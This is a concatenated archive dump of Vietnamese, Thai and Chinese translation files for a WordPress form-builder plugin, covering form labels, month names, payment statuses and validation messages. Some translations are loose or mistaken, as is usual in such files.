#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "%value không phải là địa chỉ email hợp lệ."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr "Bạn không thể chọn cựu ngày. Chọn một ngày bắt đầu từ hiện tại."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "các "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "giá trị phải là giữa "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Số lượng"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Điểm số của bạn nên được ít hơn"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Tiêu đề"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Đầu tiên"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Bài mới"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Trung"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Mã vùng"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Số điện thoại"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Đô la"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Xu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Từ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Để"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "đi "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Thiết lập lại "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Chọn một lĩnh vực "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Chọn ngày"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-th.mo000060400000012516152434416630011613 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
T
p
�
�
�
�
�
H�
S3��1
MX`s�����W�=
Y
.l
*�
�
"�
!�
=�S-�<.kHo��W�0�!`1��lT��WI]���I�6�74%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:05+0400
PO-Revision-Date: 2015-05-22 17:05+0400
Last-Translator: 
Language-Team: 
Language: th
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
เมษายนรหัสเมืองสิงหาคมเซ็นต์ เมืองประเทศธันวาคมดอลลาร์ ข้อผิดพลาดอีเมลไม่ได้ส่งข้อผิดพลาด, ไฟล์ไม่สามารถย้ายรหัสข้อผิดพลาดการรักษาความปลอดภัยที่ไม่ถูกต้องกุมภาพันธ์อันดับแรกจาก ไป มกราคมกรกฎาคมมิถุนายนล่าสุดมีนาคมพฤษภาคมmiddleไม่มีสิ่งใดถูกแสดงความคิดเห็นพฤศจิกายนตุลาคมหมายเลขโทรศัพท์:รหัสไปรษณีย์ / Zipปริมาณตั้งค่าใหม่ เลือกวันที่เลือกฟิลด์กันยายนขออภัยคุณไม่ได้รับอนุญาตให้อัปโหลดไฟล์ประเภทนี้รัฐ / จังหวัด / ภาคถนนที่อยู่ที่อยู่บรรทัดที่ 2 ถนนTheไฟล์เกินขนาดที่อนุญาตจากเขตนี้ %s ต้องการรายการที่ไม่ซ้ำกันและความคุ้มค่านี้ได้แสดงความคิดเห็นไว้แล้วนี้ไม่ได้เป็นอีเมล์ที่ถูกต้องชื่อโครงการวิจัยไปยังการเชื่อมโยงการตรวจสอบไม่ถูกต้องคุณไม่สามารถเลือกวันที่อดีต เลือกวันที่เริ่มต้นจากหนึ่งในปัจจุบันที่อยู่อีเมลของคุณที่มีการยืนยันแล้วอีเมล์ของคุณได้รับการยืนยันที่ประสบความสำเร็จตรวจสอบอีเมล์ของคุณได้หมดเวลารูปแบบของคุณถูกส่งเรียบร้อยแล้วip ของคุณจะถูกขึ้นบัญชีดำ กรุณาติดต่อผู้ดูแลเว็บไซต์ คะแนนของคุณควรจะน้อยกว่า เขตข้อมูลที่จำเป็นจะต้องมีค่าระหว่าง languages/form_maker-zh_CN.po000060400000056511152434416630012207 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:06+0400\n"
"PO-Revision-Date: 2015-05-22 17:06+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: zh\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "街道地址"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "街道地址2号线"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "城市"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "国家/省/地区"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "邮政编码"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "国家/地区"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "一月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "二月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "三月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "四月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "五月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "六月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "七月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "八月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "九月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "十月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "十一月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "十二月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "错误,不正确的安全代码。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "您的IP被列入黑名单。请与网站管理员联系"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "文件超过了允许的大小"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "对不起,您不允许上传这种类型的文件。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "错误,文件不能移动。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "这一领域的%s需要一个独特的项目,并已提交此值。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "错误,电子邮件未发送。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "没有被提交。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "成功提交表单。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "错误,电子邮件未发送。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "您的電子郵件地址已驗證。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "您的電子郵件已成功驗證。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "您的電子郵件驗證已超時。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "驗證鏈接無效。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "需要字段"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "这不是一个有效的电子邮件地址。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr "你不能選擇前者日期。選擇從當前開始的日期。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "该"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "值必须介于 "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "数量"

